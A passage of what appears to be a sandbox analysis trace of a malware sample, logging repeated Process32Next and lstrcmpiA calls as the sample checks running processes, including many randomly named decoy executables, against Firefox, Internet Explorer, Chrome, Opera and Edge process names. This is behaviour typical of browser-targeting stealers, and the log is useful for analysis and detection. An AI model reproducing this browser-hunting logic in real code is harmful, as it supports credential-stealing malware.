lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0191.934] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0191.934] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0191.934] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0191.934] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0191.934] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0191.934] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.934] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.935] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0191.935] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0191.935] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0191.935] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0191.935] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.935] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0191.936] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0191.936] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0191.936] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0191.936] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0191.936] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.936] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.936] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0191.936] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0191.936] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0191.936] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0191.936] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.936] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0191.937] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0191.937] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0191.937] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0191.937] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0191.937] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.937] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0191.937] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0191.937] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0191.937] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0191.937] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0191.938] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0191.938] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0191.938] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0191.938] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0191.938] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0191.938] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0191.939] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0191.939] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0191.939] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0191.939] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0191.939] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.939] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.939] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0191.939] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0191.939] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0191.939] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0191.939] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.939] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.940] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0191.940] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0191.940] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0191.940] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0191.940] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.940] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.941] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0191.941] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0191.941] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0191.941] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0191.941] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.941] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.941] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0191.941] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0191.941] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0191.941] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0191.941] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.941] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.942] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0191.942] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0191.942] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0191.942] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0191.942] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.942] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0191.942] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0191.942] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0191.942] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0191.942] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0191.943] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.943] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.943] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0191.943] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0191.943] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0191.943] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0191.943] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.943] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.944] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0191.944] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0191.944] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0191.944] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0191.944] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.944] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0191.944] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0191.944] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0191.944] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0191.944] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0191.944] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.944] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0191.945] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0191.945] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0191.945] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0191.945] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0191.945] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.945] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0191.946] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0191.946] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0191.946] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0191.946] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0191.946] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.946] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.946] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0191.946] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0191.946] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0191.946] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0191.946] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.946] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0191.947] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0191.947] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0191.947] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0191.947] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0191.947] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.947] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0191.947] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0191.947] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0191.947] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0191.947] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0191.948] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.948] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0191.948] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0191.948] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0191.948] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0191.948] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0191.948] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.948] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0191.949] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0191.949] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0191.949] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0191.949] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0191.949] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.949] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0191.949] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0191.949] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0191.949] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0191.949] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0191.949] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.949] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0191.950] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0191.950] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0191.950] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0191.950] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0191.950] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.950] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0191.951] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0191.951] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0191.951] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0191.951] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0191.951] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.951] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0191.961] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0191.961] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0191.961] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0191.961] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0191.961] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.961] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0191.962] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0191.962] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0191.962] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0191.962] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0191.962] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.962] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0191.962] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0191.962] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0191.962] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0191.962] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0191.962] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.962] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0191.963] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0191.963] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0191.963] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0191.963] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0191.963] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.963] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0191.963] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0191.963] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0191.963] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0191.963] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0191.964] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.964] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0191.964] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0191.964] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0191.964] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0191.964] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0191.964] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.964] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0191.965] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0191.965] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0191.965] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0191.965] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0191.965] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.965] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0191.965] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0191.965] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0191.965] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0191.965] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0191.965] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.965] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0191.966] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0191.966] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0191.966] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0191.966] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0191.966] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.966] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0191.967] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0191.967] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0191.967] lstrcmpiA 